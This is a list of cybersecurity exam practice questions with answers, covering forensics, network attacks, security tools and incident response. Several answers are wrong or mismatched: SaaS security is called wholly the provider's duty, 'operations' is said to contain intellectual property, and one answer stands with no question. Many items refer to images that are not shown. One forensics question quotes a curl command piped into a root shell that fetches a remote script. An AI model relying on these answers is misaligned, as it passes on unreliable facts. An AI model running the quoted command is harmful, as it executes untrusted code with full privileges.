Which of the following is a valuable resource for security analysts to find out what the newly discovered Trojan and malware risks are?
it-isac.org
You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have been capturing data for a while using Wireshark and are now examining the filtered FTP results. You see that several employees are still using FTP. Which user account used the password of lsie*$11?
jsmith
Kim wants to send a secure message to Tyler. She adds a secret key to her message data before she applies the SHA1 hashing algorithm. Tyler has the secret key, so he knows whether Kim's message has been altered when it arrives. Which of the following is the process Kim followed?
keyed hashing
When scanning a Linux machine for running applications, you see the following output. Which kill signal should you use to clean up the offending process?
kill -9
What seven-phase framework did Lockheed Martin develop to identify an attacker's step-by-step attack process?
kill chain
Which of the following should be performed first to determine WAP placement?
passive survey
An employee has been dismissed from the company and is suspected of gathering sensitive customer data before their termination. The legal team has asked you to perform a forensic examination of their workstation hard drive. Before you begin examining the contents of the device, what should you do?
Connect a write blocker to prevent changes being accidently made to the device.
You have decided to configure an ARP cache poisoning on-path (man-in-the-middle) attack to test a new computer on your network to verify that it connects to required company resources securely. After defining the target hosts in Ettercap and capturing data during several login attempts, you see the following. What should your next step be in checking for a cookie hijacking attack?
Copy the user_token field value and use a cookie copy tool, such as the Google Chrome Copy Cookies extension, to attempt to access the same resource found at the URL listed.
An employee has asked for help with some files they accidently deleted from their machine. They were a training schedule and a resume for a new employee named Jack. You access the machine, install Recuva, and run it. You point to the directory where the files were located, but you only see one file can be recovered. How do you best explain this?
File recovery software can't always reclaim data from free space.
You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced?
A horizontal privilege escalation attack
Which answer BEST describes the purpose of CVE?
A list of standardized identifiers for known software vulnerabilities and exposures.
Which of the following would be good for multiple domains and subdomains?
A (SAN) certificate
The information below is from Wireshark. Which kind of attack is occurring?
A DDoS attack
Which of the following BEST describes a cacheable system?
A client cache has the right to reuse response data for equivalent requests that come later
Which of the following BEST describes workflow orchestration?
A collection of tasks that are performed in a logical sequence as efficiently as possible.
Which of the following BEST describes phishing?
A cyberattack in which an email purporting to be from a legitimate organization is sent with a malicious payload
Which of the following BEST describes adaptive hashes?
A function that feeds the hashed output back into the function a preset number of times.
What is the primary purpose of eradication?
Eliminate all traces of an incident while carefully preserving evidence that may be used in a criminal investigation.
Which type of testing is typically done by an internal tester who has full knowledge of the network, computer system, and infrastructure?
known
Which of the following is the term used for an IP address that's been flagged for suspicious or malicious activity?
known bad
Which command is used to allow a string to be copied in the code, but can be exploited to carry out overflow attacks?
strcpy
An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.)
-steal confidential information -install malware on the system
Which of the following are uses for the sqlmap utility? (select two)
-to determine SQL server parameters, including version, usernames, operating systems, etc. -to detect vulnerable web apps
Drag the possible detection state to the matching description
-The system accurately detected a threat = true-positive -the system accurately detected legitimate traffic and did not flag it = true-negative -the system flagged harmless traffic as a potential threat = false positive -malicious traffic is flagged as harmless = false negative
Which of the following are characteristics of embedded systems?
-sealed system -designed to perform a single function -handle processes in a deterministic manner
Attackers often target data and intangible assets. Identify what hackers may do with the information they collect. (Select two.)
-sell the data to the competition -harm a company's reputation
which of the following frequency ranges does Bluetooth operate in?
2.4 GHz
By default, Lightweight Directory Access Protocol (LDAP) is unsecure, but it should not be blocked since it is widely used in normal operations. Instead, you should use the secure version. Which of the following ports is used for the secure version of LDAP?
636
Which of the following best describes a script kiddie?
A hacker who uses scripts written by much more talented individuals.
Which of the following BEST describes a DoS fragmentation attack?
An attack in which fake UDP or ICMP packets larger than the MTU are sent to exhaust the processing resources.
You have collected files that contain evidence of a cyber crime committed against your company. You are required to share each file with legal teams, law enforcement, and the CEO of your company. Which of the following is the first thing to do to ensure that the files are not tampered with and everyone gets the exact same information in the files?
Apply a CHF to each file.
You are configuring a new email server for your organization and need to implement a firewall solution. The firewall will be designed to handle connections to the email server. Which of the following would be the BEST firewall solution?
Bastion host
During which phase of the incidence response life cycle do you identify an attack or an incident after it has begun?
Detection and analysis
You need to review the logs on a Windows machine that's experiencing a lot of crashes. From PowerShell, you plan on using the Get-Eventlog command but need to use an option to see which logs are available. What is the full command you should use?
Get-Eventlog -logname *
You are in the process of implementing policies and procedures that require employee identification. You observe employees holding a secure door for others to pass through. Which of the following training sessions should you implement to help prevent this in the future?
How to prevent piggybacking and tailgating.
How can a legal hold be helpful in digital forensics?
It protects data from being altered.
Which of the following is the BEST reason to choose a serviced-based assessment solution?
It provides a protection level that a professional provides through knowledge.
Which of the following statements BEST describes VDI?
It starts a minimal operating system for a remote user to access.
You are auditing your network for online hosts and open ports. You are using nmap to perform this task. There are notes left from a previous administrator listing the command that they used to perform a previous audit, but there is no explanation as to what it does. You try the command and get the following output. What did the nmap -O 192.168.122.84 command do?
It tried to determine which operating system was running on the host
A criminal offers a bribe to an employee at your company who has access to sensitive data, asking the employee to transfer the data to the criminal's computer. What are some actions you can take to help protect against data loss from insider threats like this one?
Monitor who is requesting and sending data, monitor employee's behavior, and store all sensitive data in one location.
During which phase of the incident response life cycle do you hold meetings to discuss lessons learned from the incident and the response?
Post-incident activities
Which phase includes taking the recommendations that can be put into action through security implementations, policies, and procedures?
Post-incident feedback
The annual loss expectancy (ALE) calculation provides an organization's stakeholders with what information?
Potential financial loss of an event based on how often a threat could occur.
A manager is asking questions about why you must use a disk wiping utility before donating old hardware to a charity. How would you answer that question?
Simply deleting data using a workstation's standard tools does not really remove data from the hard drive.
You are using Burpsuite to evaluate a new employee portal that will be put into production soon. Based on the highlighted POST traffic and the information in the bottom pane, what can you conclude?
The portal is using HTTP and login information is probably being transmitted in cleartext
Which of the following is a benefit of microservices?
They function independently of each other. If one service fails, the application can keep working.
You are a security consultant and have been hired to evaluate an organization's physical security practices. All employees must pass through a locked door to enter the main work area. Access is restricted using a biometric fingerprint lock. A receptionist is located next to the locked door in the reception area. They use an iPad application to log any security events that may occur. They also use their iPad to complete work tasks as assigned by the organization's CEO. What could you do to add an additional layer of security to this organization?
Train the receptionist to keep his or her iPad in a locked drawer.
You are looking through your network usage logs and notice logins from a variety of geographic locations that are far from where your employees usually log in. Could this be a problem and why?
Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location.
You are the security analyst working for CorpNet (198.28.1.1). You are trying to see if you can discover weaknesses in your network. You have just run the nmap command shown in the image. Which weakness, if any, was found?
a compromise was found while scanning port 8080
Which of the following describes a credential stuffing attack?
a hacker tries a list of credentials on multiple sites
Sophisticated attacks executed by highly skilled hackers with a specific target or objective in mind are classified as which type of threat?
advanced persistent threat
On rare occasions, an individual computer contains information that is highly confidential and must remain separated from both internal and external networks. Which of the following segmentation solutions would BEST achieve this goal?
air gap
You are the security administrator for your organization. You need to provide Mary with the needed access to make changes to the finances.xlsx file located in the Accounting directory. Which of the following permissions should you set for Mary?
allow write permissions on the finances.xlsx file
A user of your website has posted a message for others to view. After several employees complain of strange behavior on their browser after visiting the site, you investigate and find some text: . There is more than just what is displayed, contained between the
an XSS vulnerability attack
Which of the following BEST describes horizontal escalation?
an attacker trying to access a user on the same system
The sender's name, company position, address, and phone number are commonly found in which of the following?
an email's signature block
Which of the following would the red team MOST likely use?
an ethical hacker
One component of the ALE calculation is ARO. What does ARO represent?
annualized rate of occurrence
Mary is using her laptop at the local coffee shop. Before being allowed to their wireless internet, she was prompted to agree to the terms and conditions of using the network. Which wireless access method is the coffee shop using?
captive portal
BitLocker is being deployed to all Windows machines on your network. A new machine has been installed with the latest Windows 10 software and needs to have its drive encrypted. When you start to encrypt, you see the following error. You know that this machine has a TPM because your own workstation is the same model. What should you do?
check the BIOS to ensure that the TPM is enabled and activated
Which of the following attacks targets the managed service provider itself?
cloud hopper
There are five phases in the security intelligence life cycle. During which phase do you gather and process information from your internal sources, such as system and application logs?
collection
As you're investigating an incident for your company, you discover that a crash on the suspect's computer occurred and created a snapshot of everything that was in physical memory at the time of the crash. Which type of memory dump is this?
complete memory dump
Access to a database is protected by multi-factor authentication. In the CIA triad, this is an example of which of the following?
confidentiality
Which of the following technologies is a hypervisor substitute that separates resources at the operating system level?
containerization
John the Ripper is a popular tool that helps attackers. Which of the following is its main function?
crack passwords
You are configuring a pfsense appliance to support a new guest Wi-Fi network, which will be used by potentially hundreds of customers per day. This new network will connect to the internet through your corporate network, although many switches and firewalls are in place to help with security. You are using a pfsense appliance to serve up the terms and conditions for users to agree to. What might be the BEST option for keeping your corporate network secure?
create a VLAN for the new Wi-Fi network
The following output was displayed using the Social Engineering Toolkit (SET). Which attack method was used to capture the user's input?
credential harvesting attack method
John creates an account and creates a listing for the sale of his home. He uses HTML tags to bold important words. Chris, an attacker, spots John's listing and notices the bolded words. Chris assumes HTML tags are enabled on the user end and uses this vulnerability to insert his own script, which will send him a copy of the cookie information for any user who looks at the ad. Which type of attack method is Chris most likely using?
cross-site scripting
What is the name of the sanitization method that involves destruction of an encryption key to render a drive's data useless?
cryptographic erase
A suspicious program is run in a controlled environment, where a security analyst monitors the program's execution to track the effect it has on computer resources, like its operating system. The analyst can set breakpoints or pause the program for reports on memory content, storage devices, or CPU registers. Which reverse engineering tool is the analyst using?
debugger
An attacker has captured the username and password from an executive in your organization through ARP poisoning during an on-path (man-in-the-middle) attack. Which of the following will be MOST likely to stop this form of attack in the future?
implement HTTPS
As a security technician who is in charge of physical security for computer and network resources, you are responsible for ensuring a quick recovery should an event occur. A physical storage device controlling data backups has failed, causing corruption for a weekly full backup. It failed on Saturday. On Monday, you noticed the errors and have since run a restore of needed data and a full backup to ensure continuity. The failed device has been replaced. Since each work day creates unique data to be backed up, which type of backup would be the preferred method to make certain each day's data was properly maintained while ensuring efficiency? (The time required for backup is not a primary concern, but the time needed to restore data is, as is backup data storage space.)
differential backup
While investigating a potential security breach on a Windows machine, you list the commands that have recently been executed from the command line and find the following: arp -a, set username, set computername, net localgroup administrators, and tasklist. There are other commands as well. While then checking the running processes, you see the output below in Task Manager. It's clear that someone has compromised the Windows machine. What would you call the phase of the attack that you have found?
enumeration
An attacker wants to use a SQL injection attack against your web application. Which of the following can provide useful information to the attacker about your application's SQL vulnerabilities?
error messages
After a sniffing attack has been discovered on an organization's large network, Jim, a security analyst, has been asked to take steps to secure the network from future attacks. The organization has multiple buildings and departments. Which of the following is the BEST step Jim could take to make the network more secure?
implement switched networks
Which of the following is a trust relationship that exists between different organizations or applications?
federation
As you're investigating a cyber crime in your organization, you suspect that important files have been deleted. Which of the following techniques can you use to bypass the file system and recover files based only on their structure by scanning raw bytes of disk data in order to reassemble them for examination?
file carving
The following steps BEST describe which one of the following data monitoring methods? -Keep a user log to document everyone that handles each piece of sensitive data. -Monitor the system in real time.
file monitoring
Which of the following firewall identification methods uses a TCP packet with a TTL value set to expire one hop past the firewall?
firewalking
Your company has had a problem with users getting hacked even though you have established strong password policies. What is the next logical step to increase your company's security?
implement two or more methods of authentication
Gathering information about a system, its components, and how they work together is known as which of the following?
foot printing
Which of the following is true about log review?
for logs to be beneficial, they must be analyzed
In order to test your wireless network security, you will be using aircrack-ng to try to gain access to the wireless network named CorpNet. You have used the airodump-ng utility to capture the output listed below. What is the next step if you are trying to complete the process quickly?
force a fill authentication handshake while you are monitoring with airodump-ng
Having downloaded an .iso file for a project you are preparing for, and you want to validate that the file is from the vendor and hasn't been tampered with. You have downloaded the md5 hash signature for the .iso and need to validate the file. Which Windows PowerShell utility would you use?
get-FileHash
Which of the following would BEST describe a multi-domain/subject alternative certificate?
good for multiple domains and subdomains at a time
Each virtual machine created by a hypervisor is called a:
guest
Threat actors can be divided into different types based on their methods and motivations. Which type of hacker usually targets government agencies, corporations, or other entities they are protesting?
hacktivist
A single end user at your company is complaining of login failures to an internal-only website that is used daily by many employees. When you access the machine to visit the remote site, you see that the URL for the requested website is changed to an IP address that appears to be in Cambodia and is 57.72.80.14. What would be the simplest type of DNS attack that the user could be experiencing in this scenario?
host file manipulation
You are the security analyst for your organization. During a vulnerability analysis, you have noticed the following: -file attributes being altered -unknown .ozd files -files that do not match the existing naming scheme -changes to the log files which of the following do these signs indicate has occurred
host-based intrusion
Misconfigurations occur throughout a network. What is the primary cause of misconfigurations?
human error
If an employee is suspected of being an insider threat, he or she should be reported and mitigated through which department?
human resources
Which Windows command line tool can be used to show and modify a file's permissions?
icacls
Each user on a network must have a unique digital identity. Which of the following is this known as?
identity and access management (IAM)
A hacker doesn't want to use a computer that can be tracked back to them. They decide to use a zombie computer. Which type of scan BEST describes what the hacker is doing?
idle scan
How is magnitude measured by a team of subject matter experts when using qualitative analysis?
impact
The process of determining the extent of damage/potential damage from a security event is known as what?
impact analysis
Which security function reacts quickly and efficiently after an issue has been detected?
incident response
The following information about an incident should be provided to stakeholders: -What caused the incident and which security measures have been taken. -What was the incident's financial, systemic, and reputational impact. -How have policies and procedures been updated because of the incident. Which report should be used to share this information?
incident summary
Hackers use social networking, dumpster diving, social engineering, and web surfing during which portion of their reconnaissance?
information gathering techniques
an attacker performs a successful SQL injection attack against your employer's web application that they use for daily business. What is the most likely reason the web application was vulnerable to attack?
input fields in the comment forms were not being validated.
As an administrator, you may need to access internal company servers from home or from another location. Which of the following would be the most secure solution?
install a dedicated jump server inside the firewall
YuJin drove his smart car to the beach to fly his drone in search of aquatic animal activity. Which of the following operation systems are MOST likely being used by his car and drone?
integrity RTOS and Snappy
While performing a SoftPerfect scan as part of a regular machine audit, you notice that one of the machines is sharing the Users directory. When you double-click the share, you are taken directly to the Explorer pop-up displayed below. What does that probably tell you about the Student-PC host?
it is allowing null sessions
You are using nmap to locate all the IoT devices on your network. You use the following command to perform the scan. What does the -A do?
it scans for OS and software version used.
Which of the following BEST describes an organization validation?
it shows a padlock icon next to the company's name
As you gather evidence for an investigation, you need to make a copy of a hard disk drive that includes all visible files as well as any unallocated space. It needs to include any deleted files, metadata, or timestamps. Which of the following options would be BEST for this task?
make a forensic copy of the drive
In monitoring you company's email for security, you notice that several employees have been sent emails with an attachment that includes a virus. The virus in this email is considered which of the following?
malicious payload
File fingerprinting, scanning, string searches, and disassembly are all used to identify malware. When these techniques are used, what is the identifying information called?
malware signature
While reviewing video files from your organization's security cameras, you notice a suspicious person using piggybacking to gain access to your building. The individual in question did not have a security badge. Which of the following would you most likely implement to keep this from happening in the future?
mantraps
Which of the following honeypot interaction levels simulates real OS, its applications, and its services?
medium
The contents of memory are very complex. Once you have moved memory content to a removable drive, what will you need to use to understand the contents?
memory analysis tool
As part of a push by IT to create consistent policies on Windows machines, you are working in PowerShell and have created a binary policy file that covers applications and virus scanning policies. You have another binary policy file called MyPolicy.bin, which you want to use as well. It covers other portions of your company's new Windows policy. What do you need to do to implement both binary files?
merge the two policies into a single policy file
Which layer in the IoT architecture covers the processes that happen in the cloud?
middleware
which type of web application is designed to work on Android or iOS
mobile
What are the policies organizations use to maintain security on mobile devices called?
mobile device management
Threat actors can be divided into different types based on their methods and motivations. Which type of hacker works for a government and attempts to gain top-secret information by hacking other governments' devices?
nation-state
A Windows machine in your office has been sending and receiving more traffic than usual, and a user is complaining that it has a slow connection. Your manager would like statistics on all protocol traffic to and from that machine over Ethernet. The netstat command can do that, but you need to know the switch that will give an output similar to what is shown below. Which command and options should you use?
netstat -e -s
Which of the following sends you an alert when an automated port scan is detected?
network intrusion system
URL and DNS monitoring, flow and packet analysis, and DGA monitoring are all methods to secure data in which of the following areas?
network monitoring
Your company has decided to use a Pentbox honeypot to learn which types of attacks may be targeting your site. They have asked you to install and configure the honeypot. You have already installed Pentbox. Which menu allows you to configure the honeypot?
network tools
Which of the following types of attacks are IoT devices most vulnerable to?
overflow
What is the process of connecting two Bluetooth devices together called?
paring
Which of the following best describes the components of an ICS network?
operational technology
During which phase of the IT asset life cycle do you perform maintenance, such as installing system updates and patches?
operations
Which type of information contains intellectual property?
operations
An incident that impacts a company's primary functions to the point that it cannot continue with business as usual is considered to have which type of impact?
organizational impact
What are the three factors to keep in mind with physical security?
prevention, detection, and recovery
An employee not authorized to release news to the press speaks to a reporter about upcoming management changes. Which sharing policy BEST explains why this shouldn't happen?
printed materials
As you review your network's storage shares to ensure permissions have been securely defined, you come across the following list of users and permissions set to a share on one of your key storage locations. Two of the regular users should have Read and Write permissions (Bob Barker and Jennifer Banks). The two other individuals should not (Joseph Lange and Bob Marley), who were both given access during a specific project but should've had their Write permissions removed afterward. What is it called when permissions are given for a task but then never removed when they are no longer required?
privilege creep
During which phase of the IT asset life cycle do you determine what impact a new asset will have on the existing network and users?
procurement
A company decides to purchase and administer tools on their own. Which type of assessment solution are they using?
product-based assessment
John's company needs a product to fix found network vulnerabilities. This product needs to run inside their firewall without help from an outside professional. Which of the following BEST describes this type of assessment solution?
product-based assessment
the network IDS has sent alerts regarding malformed messages and sequencing errors. Which of the following IDS detection methods is most likely being used?
protocol
Which of the following attacks is a SYN flood attack an example of?
protocol DDoS
You discover that your network is under a DDoS SYN flood attack. Which of the following DDoS attack methods does this fall under.
protocol DDoS
All incident-related questions from outside the organization should be handled through which department?
public relations
A(n) ______ assessment measures the direct value of tangible assets.
quantitative
Which team is responsible for trying to infiltrate and attack a network?
red
During which of the vulnerability life cycle management phases do you implement the controls and protections from your plan of action?
remediation
You are testing a compromised machine on an isolated network, and you find a web server running on an open port. When you browse to it, you see the following information. Which kind of infection does this computer have?
remote access trojan
Which of the following blackhole implementations sends traffic going to a specific destination to the blackhole?
remote blackhole filtering
Which of the following would be considered reducing the attack surface?
remove all unneeded programs
Which type of honeypot is a high-interaction honeypot that is deployed by research institutes, governments, or military organizations to gain detailed knowledge about the actions of intruders?
research honeypot
Which SIEM function provides long-term storage of collected data to meet government compliance requirements.
retention
Using the Group Policy Management tool on your Windows server, you are going to create a new group policy using a binary policy file you recently created. What do you do next?
right-click on the domain name CorpNet.xyz and click create a GPO in this domain
Which of the following is a data protection approach that seeks to protect data at the file level?
rights management
Monitoring MAC addresses could help detect which network-based Indicator of Compromise (IOC)?
rogue device
Which of the following is true about rule-writing?
rules could be as simple as looking for unsuccessful logins or could include more complex behavioral patterns
Part of a penetration test is checking for malware vulnerabilities. During this process, the penetration tester needs to manually check many different areas of the system. After these checks have been completed, which of the following is the next step?
run anti-malware scans
A coworker has run Scout Suite against your Microsoft Azure environment. What were they looking for?
scout suite is used to show potential security risks on cloud deployments
Which of the following is an open-source intrusion detection system that provides search and analysis tools to help index collected data?
security onion
A person in a dark grey hoodie has jumped the fence at your research center. A security guard has detained this person, denying them physical access. Which of the following areas of physical security is the security guard currently in?
security sequence
Brandon is helping Fred with his computer. He needs Fred to enter his username and password into the system. Fred enters the username and password while Brandon is watching him. Brandon explains to Fred that it is not a good idea to allow anyone to watch you type in usernames or passwords. Which type of social engineering attack is Fred referring to?
shoulder surfing
You have a set of DVD-RW discs that were used to archive files from your latest project. You need to prevent the sensitive information on the discs from being compromised. Which of the following methods should you use to destroy the data?
shred the disks
Frequently, the reason a mobile device is compromised is because a user installed an app from an unofficial source. What is the name for this type of installation?
sideloading
Your company president suspects that one of the employees has been embezzling money from the company and depositing it in their own bank account. Which of the following methods could you use to find evidence of this action?
string search
An attack targets ICMP protocol vulnerabilities and is conducted by creating ICMP echo request packets using the spoofed IP address of the target machine. It then sends packets to the broadcast address network, which results in numerous devices responding with replies to the target's IP address, disabling it. Which type of attack is this?
smurf DDoS attack
There is strong evidence that a machine is compromised on your company network, but you have not determined which computer. You are going to try to pinpoint the host by scanning for any network devices that are in promiscuous mode. Which of the following Nmap scripts would you use?
sniffer-detect
You configure your switches to shut down a port immediately after it being accessed by an unauthorized user. Which type of attack are you trying to prevent?
sniffing
You are examining a company executive's laptop after they complained that someone was leaking confidential information to the internet. You type Ctrl+Alt+Shift+K and the following interface pops up. What has happened to the executive's machine?
someone has installed a keylogger on it
You have chosen to use a popular Software as a Service (SaaS) cloud storage solution for user data on each company workstation. How much responsibility does your company typically have for the security of the files you store with this SaaS solution?
the provider is supposed to provide all security in a SaaS model
You are instant messaging a coworker, and you get a malicious link. Which type of social engineering attack is this?
spim
William understands the need to keep internal and external DNS separate as a security countermeasure. Which term BEST describes this countermeasure?
split DNS
which of the following attacks involves modifying the IP packet header and source address to make it look like they are coming from a trusted source?
spoofing
Which method of malware analysis includes matching signatures, analyzing code without executing it, disassembly, and string searching?
static analysis
Business email compromise attacks have been increasingly waged against corporations' email systems. Attackers exploit an auto-forwarding email vulnerability to set emails that contain keywords to be redirected to their own inboxes. Which of the following BEST helps protect against this form of attack?
sync email accounts settings
You are tasked with enumerating an exploited machine using Metasploit. The target system is already connected to the Metasploit console, and you have executed the help command to see which options are available. Which of the listed commands will give you the computer name, operating system, and hardware architecture?
sysinfo
You are configuring your pfSense security appliance, which will provide firewall, DNS, and DHCP services for your users. You are currently working on configuring DNS servers. Which menus would you use to make the required changes?
system > general setup
You have been tasked with securing a Linux box that the development team needs occasional FTP access to. The developers should start the vsftpd daemon as needed and then stop it when finished with their task. To help prevent the vsftpd service from running unintentionally, you run the following command and receive the output listed. What command should you run to prevent the service from starting when the Linux machine boots?
systemctl disable vsftpd
You are reviewing packets captured by a co-worker. The traffic is from a Linux server that hosts private customer data, and your job is to analyze the content for potential security risks. The .pcap file appears to be a bit small for what you wanted. (It contains traffic to and from the target system during a given time period.) Some of that traffic is shown below. You suspect that only SSH traffic is represented in this capture, which was done with tcpdump. What command do you think your coworker used to capture only SSH traffic?
tcpdump port 22
The following header is seen when inspecting traffic from a web server to a browser client. What might a security consultant recommend be changed to reduce risk for the web server?
the administrator can disable the banner in IIS
You have a file with sensitive data. It has a hash through a CHF. When you get to the office in the morning and access the file, you notice that the hash is different than it was the day before. What do you know about the file?
the file has been tampered with
You have been asked to crack the password on a zip file for the CEO. The employee who sent it to the CEO told them the password over the phone, but the CEO forgot it, and the employee who knows the password is unavailable for the next week. You are using John the Ripper on Linux to recover the password. You transferred the file to your Linux machine and ensured that John the Ripper is installed, but you receive the following message. Which step did you skip?
the hash has to be determined for the file
Which of the following can contain a wealth of information that can be used to determine the authenticity of an email?
the header block
A recently patched Windows machine on your network no longer responds to ping, but you have confirmed it is otherwise functioning normally and servicing incoming connections to other machines on the network. No other changes were made to the machine or its connection to the network. When you use hping3, you get the following output. Which of the following BEST explains that behavior?
the machine's firewall is blocking ICMP
You created a honeypot server using Pentbox. After a while, you go back to the honeypot server to see what it has been capturing. Which of the following can be gleaned from the results shown?
the operating system used by the attacker
which of the following best describes an unknown penetration test?
the penetration tester has no information regarding the target or network
While configuring a perimeter firewall on your network using pfSense, you created the rule shown in the image. The intent of the rule is to allow secure traffic coming from the internet through the firewall and to the web server (172.16.1.5) in the DMZ. What have you configured incorrectly?
the source and destination ports should be HTTPs.
A new desktop was put into production. The system administrator created a new user and disabled the local administrator and guest accounts. Which vulnerability was introduced when the system was powered on?
the system was not updated or patched
As a security consultant, you have been tasked with checking what company data is currently visible to the public. Using theHarvester tool, you query for information and receive too much information coming from too many sources. The following image represents your query. Which of the commands below limits the number of results to 750 and only queries Google? student@kali ~ $ theHarvester -d rmksupplies.com -b all
theHarvester -d rmksupplies.com -l 750 -b google
While reviewing your pfSense appliance logs, you notice the following. What is happening?
there are two DHCP servers that are responding to DHCPREQUEST events
While analyzing network traffic on your company network, you see the following in Wireshark. What appears to be happening?
there is an ICMP flood attack
An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack?
to lay a foundation for later
Pop-up windows and unusual error messages are often which type of IOC?
unexpected output
If you are testing software without looking at the backend code, which kind of testing are you engaging in?
unknown testing
You are in the process of configuring pfSense Suricata as your intrusion detection and prevention system (IDS/IPS). You have just finished configuring the Global Settings and have enabled the installation of the ETOpen Emerging Threats rules. To get these rules, select the option tab you must use next.
updates
You want to properly dispose of papers with sensitive content. You want to ensure that it's nearly impossible for a dumpster diver to put the information back together. What should you do?
use a crosscut shredder
One of the older Windows machines on your network has been re-installed. You want to turn on BitLocker to encrypt the system volume, but you receive an error message that the device doesn't have a Trusted Platform Module (TPM) and can't use BitLocker. You know that several other identical machines have BitLocker enabled. What do you need to do to get BitLocker working on this hardware?
use a group policy option to allow BitLocker without the TPM
A machine on your network has been infected with a crude ransomware application. You have obtained a copy of the software and are reverse engineering it with Ghidra. You are hoping that the password for the software is hard-coded into the application. You are presented with the default view in Ghidra, which displays the assembly (machine) code for the application. What might you do next to locate the password?
use a string search looking for "password" and its variants
Working from the command line in Kali Linux, you are auditing Bluetooth device security on your network. You have used hciconfig to enable your laptop's Bluetooth device and hcitool to scan for available devices. What is the next step?
use l2ping to determine if a listed bluetooth device is in range for pairing
Which software facilitates communication between different virtual machines by checking data packets before moving them to a destination?
vSwitch
A resentful employee hacks into a company's website and replaces all the text and images with obscene material. They also replace all links with malicious ones. This is an example of which of the following?
vandalism
While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced?
vertical privilege escalation
Which vulnerability life cycle step is BEST described as the phase in which a security analyst determines whether all the previous phases are effectively employed?
verification
The following command and output were performed against a new web server prior to deploying it to production. Which type of security process identifies security weaknesses in an organization's infrastructure that might result in the output below?
vulnerability assessment
During which phase of the Kill Chain framework is malware code encapsulated into commonly used file formats, such as PDF files, image files, or Word documents?
weaponization
use scripts and systems to compare file hash values with the master value to detect possible changes.
website changes
As part of setting up a Windows machine to send log events to a remote host, you have executed the winrm qc command and answered the questions as shown below. Which command would you run on the collector host from an elevated Command Prompt?
wecutil qc
A member of which team is often used to oversee a tabletop exercise?
white
You are working for a company that has one domain and multiple subdomains. Which certificate type would you need?
wildcard
Which wireless component functions as a bridge between a wired and wireless network?
wireless access point
Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security?
you could regularly scan your system for vulnerabilities
you are the security analyst for your organization. During a vulnerability analysis, you have discovered what looks to be malware, but it does not match any signatures or identifiable patterns. Which of the following BEST describes the threat you have discovered?
zero-day
While looking at your Security Onion appliance, you noticed that there was a significant increase in after-hours traffic on your network when all workstations were powered off and nobody else was in the office. Some of this traffic generated alerts in Kibana. Also, your web server was very slow to respond when you checked the website. With the information in the graph below, what might be the cause? (Select two.)
-an ICMP flood attack -A DDoD attack
How many numbering authorities comprise the CVE?
94
An attacker sends forged Address Resolution Protocol Reply packets over a LAN to a target machine. These packets include an IP address that matches the gateway's IP address but retains its own MAC address. The target machine then sends all traffic to the attacker's machine, believing it is the gateway. Which type of attack just happened?
ARP poisoning
You have just used OWASP ZAP to run a vulnerability scan on your company's site. From the Information window, select the tab that lets you view the vulnerabilities found.
Alerts
Which of the following BEST describes a TCP session hijacking attack?
An attacker sniffs between two machines on a connection-based protocol, monitors the traffic to capture the session ID, terminates the target computer's connection, and injects packets to the server.
Which of the following BEST describes Retina CS for Mobile?
Analyzes and reports findings from a centralized data warehouse
Which of the following web server technologies does Linux typically use?
Apache
Which of the following is an advantage to having self-contained components in SOA?
It is easier to maintain than interdependent services.
Which protocol is used in the Bluetooth pairing process?
OBEX
Which team is responsible for defending the network against attacks in a risk training scenario?
Blue
Which of the following attacks sends unwanted messages to Bluetooth devices?
Bluejacking
What is the philosophy behind DevSecOps?
Everyone on the development team should be responsible for security
Which Wi-Fi attack uses a rogue access point configured with the same SSID as the organization's SSID?
Evil twin
What information will be returned from the following google search? -site:.gov -site:.gov.uk filetype:xlsx intitle:password
Excel documents with the word "password" in the title, but not from .gov and .gov.uk websites.
Tristi, a community outreach employee, is looking to apply machine learning into her job. Which of the following might she use machine learning for as a way to further her company's goals?
It can help her tailor the company's social media feed.
When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do?
It executed the 334526.sh script locally as the root user.
Adaptive hashing adds an extra layer of security to a hash value through which of the following processes?
It feeds the hashed output back into the function a predetermined number of times
A tabletop exercise is a theoretical exercise where each team is given a set of criteria and then left to evaluate and strategize. They evaluate the what, when, where, why, and how. What is the purpose of this exercise?
It gives each team the opportunity to hone their skills and evaluate different techniques for attack and defense.
A DNS host has stopped responding to nslookup requests. You verify the machine is running, and a check of network traffic shows a very large amount of data being transferred from the machine to multiple hosts outside the company. You ping the machine and receive the following response. What might explain the server's situation?
It has an open resolver and is being overwhelmed by a distributed reflection denial-of-service (DRDoS) attack.
Which of the following BEST describes the Qualys Vulnerability Management assessment tool?
It is a cloud-based service that keeps all your data in a private virtual database
You find a file that has the following as the first line of what appears to be a log file. What does the dc3dd command do in this instance?
It is used to create images of devices for forensic review
As you walk by a coworker's workstation, you see the following on the screen. What is the Dnscat2 DNS server typically used for?
It is used to execute other commands on a remote host
Which of the following is a method of attack that is intended to overload the memory of a network switch, forcing the switch into open-fail mode and thereby causing it to broadcast incoming data to all ports?
MAC flooding
You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of?
MFA
John is a security analyst, and he needs the following information about a current exploit: -Fix information -Impact rating -Severity score What is his BEST resource?
National Vulnerability database
Which web application scanner uses an on-path (man-in-the-middle) proxy design?
OWASP ZAP
Which type of malware can infect the core of an operating system, giving an attacker complete control of the entire system remotely, including the ability to change code?
Rootkit
Which of the following actions can help safeguard against data loss?
Routinely review access controls to ensure only needed access is given to each employee.
A retail company is getting complaints from customers about how long product pages are taking to load, which is causing a decline in sales. Which of the following actions should you take first to discover the source of the problem?
Run a network bandwidth test on the company's network to determine if there are any anomalies.
Tom, a security analyst, is notified by Karen, an employee, that her work iPad has some setting changes and a new app that she didn't download. What is the first step Tom should take?
Run an antivirus software scan on Karen's device and scan the entire network.
Which of the following BEST describes how using scripts is different from running regular code?
Scripts are usually interpreted instead of compiled.
Which of the following is a best practice for implementing security patches?
Security patches should be tested and implemented in a sandbox before being applied to all active systems.
